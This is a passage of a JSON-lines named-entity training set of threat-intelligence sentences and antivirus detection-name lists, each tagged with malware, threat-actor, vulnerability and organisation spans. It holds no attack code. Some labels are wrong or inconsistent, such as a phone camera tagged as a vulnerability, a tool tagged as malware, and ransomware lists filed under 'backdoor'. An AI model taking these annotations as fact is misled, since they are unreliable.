backdoor also known as: HW32.Packed.4904 Trojan.Clicker.Delf.CN Trojan.Clicker.Delf.CN Trojan/Clicker.Delf.cn Trojan.Win32.Delf.ifph Trojan.Adclicker TROJ_ADCLICKE.AS Trojan-Clicker.Win32.Delf.cn Trojan.CL.Delf!GHMyZMRoBZw Trojan.Win32.Clicker.197194[h] Troj.Clicker.W32.Delf.cn!c Virus.Win32.Heur.e Trojan.Clicker.Delf.CN Backdoor.Win32.Popwin.~IQ Trojan.Clicker.Delf.CN Trojan.Dasist Trojan.Delf.Win32.8103 TROJ_ADCLICKE.AS BehavesLike.Win32.PWSZbot.cc 
Trojan/Delf.ab TR/Click.Delf.CN.5 Trojan[Clicker]/Win32.Delf Trojan.Clicker.Delf.CN Win-Trojan/Xema.variant Trojan:Win32/Adcliker.K TrojanClicker.Delf Win32.Trojan.Delf.Lhxa Trojan.Clicker.Delf.CN Clicker.CSA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001027", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Noobot!O Backdoor.Poftsyun Backdoor.W32.Noobot.h!c Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Ecltys Backdoor.Win32.Noobot.h Trojan.Win32.Noobot.ylgzy Backdoor.Win32.A.Noobot.158756 Backdoor.Noobot.Win32.6 BehavesLike.Win32.Downloader.ch Backdoor.Win32.Ecltys W32/Trojan.SKHW-8707 Backdoor/Noobot.d BDS/Noobot.A.14 Backdoor:Win32/Poftsyun.A Backdoor.Win32.Noobot.h Trojan/Win32.Noobot.R214072 Backdoor.Noobot Trojan.Zusy.D49A6 Win32.Backdoor.Noobot.Pfts Backdoor.Noobot!KDSSDgztHWQ W32/Noobot.H!tr.bdr Win32/Trojan.231", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001028", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.ChePro.aaa WIN.MACRO.SCRIPT.IRC.WORM.Virus Trojan-Downloader.Win32.ChePro.aaa PUP/Win32.Avdownloader.C2126268", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001030", "source": "cyner2_train"}} {"text": "Threat actors keep taking advantage of the tax season in the US, using tax-related phishing scams to US-based victims to infect systems with stealthy malware.", "spans": {"THREAT_ACTOR: Threat actors": [[0, 13]], "ORGANIZATION: US-based victims": [[101, 117]], "SYSTEM: infect systems": [[121, 135]], "MALWARE: malware.": [[150, 158]]}, "info": {"id": "cyner2_train_001031", "source": "cyner2_train"}} {"text": "In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199.", "spans": {"VULNERABILITY: exploited the Microsoft Windows vulnerability": [[64, 109]]}, "info": {"id": "cyner2_train_001032", "source": 
"cyner2_train"}} {"text": "These threats are usually exacerbated by the further abuse of legitimate tools such as PowerShell, or script automation utility AutoIt. It's thus not surprising that we discovered an information stealer employing LNK files, which our sensors detected in Israeli hospitals.", "spans": {"MALWARE: threats": [[6, 13]], "MALWARE: AutoIt.": [[128, 135]], "ORGANIZATION: Israeli hospitals.": [[254, 272]]}, "info": {"id": "cyner2_train_001034", "source": "cyner2_train"}} {"text": "INDEX MNEMONIC DESCRIPTION 0x0 JMP Special obfuscated conditional Jump ( always taken or always ignored ) 0x1 JMP Jump to a function ( same as opcode 0x10 ) 0x2 CALL Call to the function pointed by the internal VM value 0x3 CALL Optimized CALL function ( like the 0x1E opcode of the 32-bit VM ) 0x4 EXEC Execute code and move to the next packet 0x5 JMP Jump to an internal function 0x6 NOP No operation , move to the next packet 0x7 CALL Call an imported API ( whose address is stored in the internal VM value ) 0x8 LOAD Load a value into the VM descriptor structure * 0x9 STORE Store the internal VM value inside a register 0xA WRITE Resolve a pointer and store the value of a register in its content 0xB READ Move the value pointed by the VM internal value into a register 0xC LOAD Load a value into the VM descriptor structure ( not optimized ) 0xD CMP Compare the value pointed by the internal VM descriptor with a register 0xE CMP Compare the value pointed by the internal VM descriptor with an immediate value 0xF XCHG Exchange the value pointed by the internal VM descriptor with a register 0x10 SHL Jump to a function ( same as opcode 0x1 ) This additional virtual machine performs the same duties as the one already described but in a 64-bit environment .", "spans": {}, "info": {"id": "cyner2_train_001036", "source": "cyner2_train"}} {"text": "The campaign was found to have delivered several types of malware including Redline Stealer, AgentTesla, Eternity, Blackmoon and Philadelphia 
Ransomware.", "spans": {"THREAT_ACTOR: The campaign": [[0, 12]], "MALWARE: malware": [[58, 65]], "MALWARE: Redline Stealer, AgentTesla, Eternity, Blackmoon": [[76, 124]], "MALWARE: Philadelphia Ransomware.": [[129, 153]]}, "info": {"id": "cyner2_train_001037", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Otwyacal.C Win32.Trojan.WisdomEyes.16070401.9500.9748 W32.Wapomi.C!inf Win.Trojan.Vjadtre-6170948-0 Win32.HLLP.Protil.1 BehavesLike.Win32.Virut.ch W32/Jadtre.C Trojan.Symmi.D4E83 Trj/CI.A Win32/Wapomi.Z Virus.Win32.Wapomi.a Exploit.Win32.ShellCode", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001038", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Msil Trojan.Kazy.D4D672 TrojanDownloader:MSIL/Winpud.A Trojan/Win32.Inject.C149530 Win32/Trojan.a9f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001039", "source": "cyner2_train"}} {"text": "However, the attacks against targets in the Middle East except Israel were renewed in less than 20 days.", "spans": {}, "info": {"id": "cyner2_train_001041", "source": "cyner2_train"}} {"text": "rename .APK Android application package files used to install the malicious apps,", "spans": {"SYSTEM: Android application package": [[12, 39]], "MALWARE: malicious apps,": [[66, 81]]}, "info": {"id": "cyner2_train_001042", "source": "cyner2_train"}} {"text": "Malicious code was appended to the compromised script file, which redirected a visitor.", "spans": {"MALWARE: Malicious code": [[0, 14]]}, "info": {"id": "cyner2_train_001043", "source": "cyner2_train"}} {"text": "The backdoor provided an alternative foothold in several observed instances for the group and employed a few tricks like using the Intel SSE extended instruction set to avoid emulation and obscure analysis.", "spans": {"MALWARE: The backdoor": [[0, 12]], "ORGANIZATION: group": [[84, 89]], "VULNERABILITY: the Intel SSE extended 
instruction set": [[127, 165]]}, "info": {"id": "cyner2_train_001044", "source": "cyner2_train"}} {"text": "The malware uses the Tor anonymity network for command and control C2 and does not require network connectivity to encrypt files, which complicates detection, prevention, and remediation.", "spans": {"MALWARE: malware": [[4, 11]]}, "info": {"id": "cyner2_train_001045", "source": "cyner2_train"}} {"text": "The list of vulnerable devices, as well as the logins and passwords that go with them, are stored on the server belonging to the cybercriminals.", "spans": {"VULNERABILITY: vulnerable devices,": [[12, 31]], "VULNERABILITY: logins": [[47, 53]], "VULNERABILITY: passwords": [[58, 67]], "SYSTEM: the server": [[101, 111]], "THREAT_ACTOR: cybercriminals.": [[129, 144]]}, "info": {"id": "cyner2_train_001047", "source": "cyner2_train"}} {"text": "NexusLogger is a cloud-based keylogger that uses the Microsoft .NET Framework and has a low level of sophistication.", "spans": {"MALWARE: NexusLogger": [[0, 11]], "MALWARE: cloud-based keylogger": [[17, 38]], "SYSTEM: Microsoft .NET Framework": [[53, 77]]}, "info": {"id": "cyner2_train_001048", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.CC Packed.Win32.CPEX-based!O Backdoor.PePatch.Win32.2676 Trojan.Crypt.CC W32/Trojan.GQIB-3577 TrojanSpy.KeyLogger Trojan.Win32.Llac.laav Trojan.Win32.CPEXbased.oyaq Trojan.Win32.Buzus.589824[UPX] Packer.W32.CPEX-based.kZ3Y Trojan.Crypt.CC Trojan.PWS.Lineage.4319 BehavesLike.Win32.PUPXAO.dh W32/Trojan2.ANIR Trojan/Buzus.afzu TR/Dldr.Buzus.dhk Trojan[Packed]/Win32.CPEX-based TrojanDropper:Win32/Sharke.C Trojan.Crypt.CC Trojan.Win32.Llac.laav Trojan.Crypt.CC Trojan/Win32.Buzus.C22005 Trojan.Crypt.CC Trojan.Crypt.CC HackTool.Win32.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001049", "source": "cyner2_train"}} {"text": "The URLs for Sundown requests for Flash files end in .swf, while Silverlight requests end in .xap.", "spans": 
{"MALWARE: Sundown": [[13, 20]], "MALWARE: Silverlight": [[65, 76]]}, "info": {"id": "cyner2_train_001050", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Trojan Trojan.Win32.Mlw.euwoug Backdoor:Win32/DarkEnergy.A!bit Backdoor.Bot Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001051", "source": "cyner2_train"}} {"text": "After laying low for a few years, it had a sudden resurgence last May.", "spans": {}, "info": {"id": "cyner2_train_001052", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Surabaya.Worm Worm.Win32.AutoRun!O Worm.SillyShare.EE2 W32/Pitin.worm Worm.AutoRun W32.W.AutoRun.luA8 WORM_VB.DTH Win32.Trojan.VB.iy W32/Worm.BGBK W32.SillyFDC Win32/Dodaykil.B WORM_VB.DTH Win.Worm.VB-632 Worm.Win32.AutoRun.bant Trojan.Win32.AutoRun.cnwrek Trojan.Win32.Autorun.40960.R Worm.Win32.VB.~E Win32.HLLW.Autoruner.874 Virus.VB.Win32.86 BehavesLike.Win32.Dropper.ch Worm.Win32.AutoRun W32/Worm.DPLM-0673 Worm/AutoRun.tyn TR/VB.aei Worm/Win32.AutoRun Trojan.Heur.E9EB80 Worm.Win32.AutoRun.bant Worm:Win32/SillyShareCopy.E HEUR/Fakon.mwf SScope.Trojan.VBO.0348 Trj/Yabarasu.A Worm.Pitin Win32/VB.DG Trojan.Win32.Autorun.bep Worm.SillyShareCopy!GFdqFqCX45w", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001054", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Dropper.MM W97M/Dropper.x W97M/Mdropper.G W2KM_FAREIT.IAV Trojan.Script.Drop.dyxcgh Trojan-Dropper:W97M/MaliciousDoc.A Trojan.PWS.Stealer.4118 W2KM_FAREIT.IAV W97M/Mdropper.G TR/Crypt.Xpack.310779 Trojan[PSW]/Win32.Fareit TrojanPSW.Fareit possible-Threat.Embedded.ExeInOffice virus.office.qexvmc.1100", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001055", "source": "cyner2_train"}} {"text": "Operation Groundbait Russian: Прикормка, Prikormka is an ongoing cyber-surveillance", "spans": {"THREAT_ACTOR: Operation Groundbait": [[0, 20]], "THREAT_ACTOR: Прикормка, Prikormka": 
[[30, 50]]}, "info": {"id": "cyner2_train_001056", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.849 W97M.Downloader.BLR Troj.Downloader.Msoffice!c W97M.Downloader W2KM_HANCITOR.YYSYN VB:Trojan.Valyria.849 VB:Trojan.Valyria.849 Trojan.Script.Downloader.espmja VB:Trojan.Valyria.849 VB:Trojan.Valyria.849 W2KM_HANCITOR.YYSYN TrojanDownloader:O97M/Damatak.A VB:Trojan.Valyria.849 virus.office.qexvmc.1080", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001068", "source": "cyner2_train"}} {"text": "Volexity has tied this attack campaign to an advanced persistent threat APT group first identified as OceanLotus by SkyEye Labs in 2015.", "spans": {"ORGANIZATION: Volexity": [[0, 8]], "THREAT_ACTOR: attack campaign": [[23, 38]], "THREAT_ACTOR: advanced persistent threat APT group": [[45, 81]], "THREAT_ACTOR: OceanLotus": [[102, 112]], "ORGANIZATION: SkyEye Labs": [[116, 127]]}, "info": {"id": "cyner2_train_001070", "source": "cyner2_train"}} {"text": "Probably, attackers used web site vulnerabilities for placing malicious files.", "spans": {"THREAT_ACTOR: attackers": [[10, 19]], "VULNERABILITY: vulnerabilities": [[34, 49]]}, "info": {"id": "cyner2_train_001071", "source": "cyner2_train"}} {"text": "Since our previous publication, we have found another, similar but different payload used to target a second organization in Saudi Arabia that was configured to wipe systems twelve days later on November 29, 2016.", "spans": {"MALWARE: payload": [[77, 84]], "SYSTEM: wipe systems": [[161, 173]]}, "info": {"id": "cyner2_train_001072", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Losya.gg Trojan-Ransom.Win32.Losya.gg Trojan-Ransom.Win32.Losya!IK Trojan.Winlock.2932 Trojan/Losya.cs Trojan:Win32/LockScreen.BA Hoax.Losya.bd Trojan-Ransom.Win32.Losya W32/Krap.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001073", "source": "cyner2_train"}} {"text": "Servers of The Left in 
German Bundestag have been infected with malware, apparently by a state-sponsored group of Russian origin.", "spans": {"SYSTEM: Servers of The Left": [[0, 19]], "MALWARE: malware,": [[64, 72]], "THREAT_ACTOR: state-sponsored group": [[89, 110]]}, "info": {"id": "cyner2_train_001074", "source": "cyner2_train"}} {"text": "Sakula also leverages single-byte XOR encoding to obfuscate various strings and files embedded in the resource section, which are subsequently used for User Account Control UAC bypass on both 32 and 64-bit systems.", "spans": {"MALWARE: Sakula": [[0, 6]], "SYSTEM: 32 and 64-bit systems.": [[192, 214]]}, "info": {"id": "cyner2_train_001075", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.ICQNuker.19456 Trojan.ICQNuker!jj+ciDVRnhs Hacktool.Nuker Smalltroj.EAH TROJ_ICQNUKER.A Trojan.ICQNuker Trojan.Win32.ICQNuker Trojan.Win32.ICQNuker Trojan.Win32.ICQNuker.dhzl TrojWare.Win32.ICQNuker Trojan.Win32.ICQNuker Trojan.ICQNuker TROJ_ICQNUKER.A Trojan/Win32.ICQNuker Trojan.Win32.ICQNuker.19456 Trojan.Win32.ICQNuker Win32.Trojan.ICQNuker Hacktool.Nuker", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001077", "source": "cyner2_train"}} {"text": "Linux malware is slowly becoming more popular.", "spans": {"MALWARE: malware": [[6, 13]]}, "info": {"id": "cyner2_train_001078", "source": "cyner2_train"}} {"text": "This porn clicker Trojan, which we detect as Android/Clicker, has once more become available for download from Play Store.", "spans": {"MALWARE: porn clicker Trojan,": [[5, 25]], "SYSTEM: Play Store.": [[111, 122]]}, "info": {"id": "cyner2_train_001079", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.LoadAdv.ABV Trojan.Piptea Downloader.Small.Win32.11983 Trojan.Downloader.LoadAdv.ABV Multi.Threats.InArchive W32/Downldr2.FZLV Trojan.Dropper Win.Downloader.65024-1 Trojan-Downloader.Win32.Small.agns Trojan.Downloader.LoadAdv.ABV Trojan.Win32.Small.bcwtvk 
Trojan.Win32.Downloader.246584 Trojan.Downloader.LoadAdv.ABV W32/Downloader.UPFZ-7129 Trojan[Downloader]/Win32.Small Trojan:Win32/Piptea.E Trojan-Downloader.Win32.Small.agns Trojan.DL.Small!mUFJjjvpkTw Email-Worm.Win32.Joleee Win32/Trojan.8ed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001080", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Adclicker.DH Trojan-Clicker.Win32.Small!O Trojan/Clicker.Small.tc Trojan.Zusy.D730F Win32.Trojan.WisdomEyes.16070401.9500.9905 W32/Trojan.HWTO-6812 Trojan.KillAV Win32/TrojanClicker.Small.QZ TROJ_CLICKER.UU Win.Trojan.Clicker-1328 Trojan.Win32.Small.pbsu Trojan.Win32.Clicker.20480.C TrojWare.Win32.TrojanClicker.Small.QZ Trojan.PWS.Gamania.16782 Trojan.Small.Win32.16009 W32/Trojan2.AUEO TrojanClicker.Small.aps W32.Email.Worm.Silly TR/Click.Mon.1 Trojan[Clicker]/Win32.Small Dropper/Win32.Small.R41509 TrojanClicker.Small Trj/CI.A Trojan-Downloader.Win32.Small W32/CLICKER.UU!tr Win32/Trojan.d06", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001081", "source": "cyner2_train"}} {"text": "SpyNote RAT is capable of performing a variety of alarming functions that includes : Activating the device ’ s microphone and listening to live conversations Executing commands on the device Copying files from the device to a Command & Control ( C & C ) center Recording screen captures Viewing contacts Reading SMS messages The screenshot below shows part of the sandbox ’ s report on the SpyNote RAT ’ s signature and detected functions : The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder , which was leaked last year .", "spans": {"MALWARE: SpyNote RAT": [[0, 11], [390, 401], [540, 551]], "ORGANIZATION: Netflix": [[450, 457]]}, "info": {"id": "cyner2_train_001085", "source": "cyner2_train"}} {"text": "The details we are releasing are to provide insight into attack methodologies being employed by sophisticated 
groups such as FIN7 who are consistently changing techniques between attacks to avoid detection.", "spans": {"THREAT_ACTOR: groups": [[110, 116]], "THREAT_ACTOR: FIN7": [[125, 129]]}, "info": {"id": "cyner2_train_001086", "source": "cyner2_train"}} {"text": "The Dyre group, a major malware spam producer, has changed their initial malware dropper to utilize Microsoft Word document macros instead of the usual executable types, such as .exe files contained in a .zip.", "spans": {"THREAT_ACTOR: The Dyre group,": [[0, 15]], "MALWARE: malware dropper": [[73, 88]], "SYSTEM: Microsoft Word document macros": [[100, 130]]}, "info": {"id": "cyner2_train_001087", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom_Shieldcrypt.R00WC0DEQ17 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Ransom.WTYO-5087 Ransom.Troldesh Ransom_Shieldcrypt.R00WC0DEQ17 Win32.Trojan-Ransom.Filecoder.BO Trojan.Win32.Encoder.ephyjr Trojan.Encoder.11787 Ransom:Win32/Shieldcrypt.A Trj/GdSda.A Win32.Trojan.Raas.Auto Trojan-Ransom.Shieldcrypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001088", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Backdoor2.DBLT WS.Reputation.1 Win32.TRVirtl HackTool.Patcher!7MmWKbVM2EE Tool.DVTPatch TR/Virtl.7341 Trojan/Virtl.b Win32.HACKTOOL.pocomail.cx.kcloud W32/Backdoor2.DBLT Trojan.Virtl.7341", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001089", "source": "cyner2_train"}} {"text": "IOC s for the Wildifre ransomware", "spans": {"MALWARE: Wildifre ransomware": [[14, 33]]}, "info": {"id": "cyner2_train_001090", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/PinkBlocker.arw Trojan.Heloag BKDR_HELOAG.SM PUA.Packed.ASPack BDS/Heloag.A.30 BKDR_HELOAG.SM Backdoor.Win32.Heloag!IK Backdoor:Win32/Heloag.A Trojan.Heloag Backdoor.Win32.Heloag Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001091", "source": "cyner2_train"}} {"text": 
"Symantec discovered the Greenbug cyberespionage group during its investigation into previous attacks involving W32.Disttrack.B aka Shamoon.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Greenbug cyberespionage group": [[24, 53]], "THREAT_ACTOR: Shamoon.": [[131, 139]]}, "info": {"id": "cyner2_train_001092", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Rbot!O Backdoor.Rbot.20414 Win32.Trojan.WisdomEyes.16070401.9500.9964 Win.Trojan.Mybot-4324 Trojan.Win32.Rbot.cuqnmc Win32.HLLW.MyBot.based Backdoor.RBot.Win32.38765 BehavesLike.Win32.Msposer.jz Backdoor.Win32.SdBot EXP/DameWare.ggg Trojan[Backdoor]/Win32.Rbot Win32.Hack.RBotT.a.83968 Backdoor.Win32.Sdbot.yx W32/SdBot.IT!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001095", "source": "cyner2_train"}} {"text": "Cylance SPEAR has uncovered a long-standing persistent threat targeting numerous major industries spread across Japan, South Korea, the United States, Europe, and several other Southeast Asian countries.", "spans": {"ORGANIZATION: Cylance SPEAR": [[0, 13]], "THREAT_ACTOR: persistent threat": [[44, 61]], "ORGANIZATION: industries": [[87, 97]]}, "info": {"id": "cyner2_train_001096", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandownloader.Script Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Drop.etdypm Trojan.MulDrop7.42636 BehavesLike.Win32.Dropper.fh W32/Trojan.EURA-7093 Trojan:VBS/Sminager.D Exploit.UACSkip Trj/CI.A Exploit.UACSkip! 
Win32/Trojan.Downloader.251", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001098", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.424D Virus.Hupigon.Win32.5 Trojan/PSW.QQShou.is TSPY_QQSHOU.GY Win32.Trojan.WisdomEyes.16070401.9500.9956 W32/Trojan.KBAU-5151 Trojan.PWS.QQPass TSPY_QQSHOU.GY Backdoor.Win32.Hupigon.vpk Trojan.Win32.QQShou.lofh Backdoor.W32.Rbot.lgxa Backdoor.Win32.Popwin.~IQ Trojan.PWS.Gamania.5830 W32/Trojan.LGV Trojan/PSW.QQShou.eu Trojan[Backdoor]/Win32.Hupigon.vpk PWS:Win32/Whoran.A Backdoor.Win32.Hupigon.vpk Trojan.PWS.QQShou!NqwrJPeZllY W32/Hupigon.VPK!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001099", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Rotbrow.KK6 PUP.Optional.BProtector Trojan.Bromngr.Win32.445 Win32.Adware.Bprotector.a Adware.GoonSquad Win.Adware.BProtector-1 Win32.Application.BHO.A Trojan.Win32.BGuard.cunxgw Application.Win32.bProtector.KA Adware.BGuard.47 Trojan-Dropper.Win32.Rotbrow Trojan.Bromngr.ed W32.Adware.Installbrain Trojan.Adware.BHO.Bprotector.1 TrojanDropper:Win32/Rotbrow.A W32/Bprotect.B!tr Trj/CI.A Win32/Trojan.10d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001103", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kryptik.ASES Trojan.MulDrop1.32726 Win32/Tnega.CZG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001104", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.Delf.AL Worm/W32.G_Spot.200704 Backdoor.G_Spot.r8 W32/Grandspot.worm!p2p Trojan.Crypt.Delf.AL W32/G_Spot.c Trojan.Win32.GSpot.dzdidh W32.HLLW.Sambut Win32/GrandSpot.C BKDR_GSPOT.15 P2P-Worm.Win32.G_Spot.c Worm.P2P.G_Spot!iWsciEZCFG4 W32.W.G_Spot.c!c Trojan-Downloader.win32.Delf.xoq Trojan.Crypt.Delf.AL Worm.Win32.GrandSpot.C Trojan.Crypt.Delf.AL WIN.WORM.Virus Worm.GSpot.Win32.1 BKDR_GSPOT.15 BehavesLike.Win32.Eggnog.ch 
Worm/Sramota.qs BDS/GSpot.15.Srv W32/G_Spot.C Trojan[Backdoor]/Win32.G_Spot Trojan.Crypt.Delf.AL Win32/KorGameHack.worm.200704 Worm:Win32/Gespo.C Win32/Spotbot.15 Worm.G_Spot Trojan-PWS.Win32.Lmir.mw Trojan.Crypt.Delf.AL Worm/Gspot.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001107", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Exetemp!O W32/Backdoor.GJUL-4537 TROJ_DROPER.SMJN Trojan-Dropper.Win32.Exetemp.a Troj.Dropper.W32.Exetemp.tnGD Trojan.MulDrop.30795 TROJ_DROPER.SMJN W32/Backdoor2.FAQY Backdoor/Huigezi.2009.api W32.Trojan.Exetemp Trojan[Dropper]/Win32.Exetemp TrojanDropper:Win32/Exetemp.A!bit Trojan.Graftor.D45DD Trojan-Dropper.Win32.Exetemp.a TrojanDropper.Exetemp Trojan.DL.Win32.Small.grn W32/Exetemp.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001108", "source": "cyner2_train"}} {"text": "Hydrochasma, the threat actor behind this campaign, has not been linked to any previously identified group, but appears to have a possible interest in industries that may be involved in COVID-19-related treatments or vaccines.", "spans": {"THREAT_ACTOR: Hydrochasma, the threat actor": [[0, 29]], "THREAT_ACTOR: campaign,": [[42, 51]], "THREAT_ACTOR: group,": [[101, 107]], "ORGANIZATION: industries": [[151, 161]]}, "info": {"id": "cyner2_train_001109", "source": "cyner2_train"}} {"text": "The malware is usually packaged with apps that users may download from third-party app stores.", "spans": {"MALWARE: The malware": [[0, 11]], "SYSTEM: apps": [[37, 41]], "SYSTEM: third-party app stores.": [[71, 94]]}, "info": {"id": "cyner2_train_001110", "source": "cyner2_train"}} {"text": "Analysis from cyintanalysis.com describing infrastructure of an actor using PoisonIvy and PlugX implants.", "spans": {"ORGANIZATION: cyintanalysis.com": [[14, 31]], "SYSTEM: infrastructure": [[43, 57]], "THREAT_ACTOR: actor": [[64, 69]], "MALWARE: PoisonIvy": [[76, 85]], "MALWARE: PlugX implants.": 
[[90, 105]]}, "info": {"id": "cyner2_train_001111", "source": "cyner2_train"}} {"text": "Once infected, Mansoor's phone would have become a digital spy in his pocket, capable of employing his iPhone's camera and microphone to snoop on activity in the vicinity of the device, recording his WhatsApp and Viber calls, logging messages sent in mobile chat apps, and tracking his movements.", "spans": {"SYSTEM: phone": [[25, 30]], "SYSTEM: a digital spy": [[49, 62]], "VULNERABILITY: iPhone's camera": [[103, 118]], "VULNERABILITY: microphone": [[123, 133]], "SYSTEM: WhatsApp": [[200, 208]], "SYSTEM: Viber calls,": [[213, 225]], "SYSTEM: mobile chat apps,": [[251, 268]]}, "info": {"id": "cyner2_train_001112", "source": "cyner2_train"}} {"text": "Once installed, it hides itself and then tricks the user into typing his or her credentials into fake bank web pages that have been injected onto the device's screen.", "spans": {"SYSTEM: the device's screen.": [[146, 166]]}, "info": {"id": "cyner2_train_001113", "source": "cyner2_train"}} {"text": "It requires root privileges to be installed, and relies on: A userland binary, providing an encrypted backdoor with remote code execution and proxy functionalities A lightweight Linux Loadable Kernel Module, providing an additional port-knocking service for the userland backdoor", "spans": {"MALWARE: encrypted backdoor": [[92, 110]], "SYSTEM: lightweight Linux Loadable Kernel Module,": [[166, 207]], "SYSTEM: port-knocking service": [[232, 253]], "MALWARE: backdoor": [[271, 279]]}, "info": {"id": "cyner2_train_001117", "source": "cyner2_train"}} {"text": "Recently, FortiGuard Labs found a phishing campaign targeting French Nationals.", "spans": {"ORGANIZATION: FortiGuard Labs": [[10, 25]], "THREAT_ACTOR: a phishing campaign": [[32, 51]], "ORGANIZATION: French Nationals.": [[62, 79]]}, "info": {"id": "cyner2_train_001119", "source": "cyner2_train"}} {"text": "Palo Alto Networks has discovered a previously unknown remote access Trojan RAT 
that has been active for over two years.", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: unknown remote access Trojan RAT": [[47, 79]]}, "info": {"id": "cyner2_train_001120", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 TROJ_ETERNALROM.A TROJ_ETERNALROM.A Win32.Exploit.EqEternalRomance.A Exploit.Win32.ShadowBrokers.aj Exploit.Win32.ShadowBrokers.epajub Exploit.Win32.ShadowBrokers.~ Trojan.Equation.37 Exploit.ShadowBrokers.Win32.13 Trojan.Exploit.Equation Exploit.ShadowBrokers.v W32.Hacktool.Equation TR/Eqtonex.HG Trojan[Exploit]/Win32.ShadowBrokers Uds.Dangerousobject.Multi!c Exploit.Win32.ShadowBrokers.aj Exploit:Win32/Eqtonex.A Trojan/Win32.ShadowBrokers.C1919146 Exploit.ShadowBrokers Trj/CI.A Win32/Exploit.Equation.EternalRomance.A HackTool.Win32.ShadowB.a Exploit.ShadowBrokers! Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001121", "source": "cyner2_train"}} {"text": "The Corebot malware family is relatively new and was first documented by Security Intelligence.", "spans": {"MALWARE: The Corebot malware family": [[0, 26]], "ORGANIZATION: Security Intelligence.": [[73, 95]]}, "info": {"id": "cyner2_train_001122", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.Cosmu.PE Win32.Worm.VB.NZQ Trojan.Win32.Cosmu!O W32.Lamer.EL3 Downloader.VB.Win32.95 Trojan/Downloader.VB.eex Win32.Virus.VBbind.a W32.Besverit Win32/VB.JU TROJ_DLOADR.SMM Win.Trojan.Cosmu-4 Virus.Win32.Lamer.el Win32.Worm.VB.NZQ Trojan.Win32.VB.ltch Troj.Downloader.W32.VB.l4ji Worm.Win32.VB.kp Win32.Worm.VB.NZQ Win32.Worm.VB.NZQ Win32.HLLW.Autoruner.6014 TROJ_DLOADR.SMM BehavesLike.Win32.Autorun.th Trojan/Cosmu.lan Trojan.Win32.Cosmu.887991 Virus.Win32.Lamer.el Win32.Worm.VB.NZQ Win32/Lamer.D Win32.Worm.VB.NZQ SIM.Trojan.VBO.0859 Trojan.Downloader Win32/VB.NUP Worm.Win32 W32/AutoRun.RPV!worm W32/OverDoom.A Virus.Win32.Lamer.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
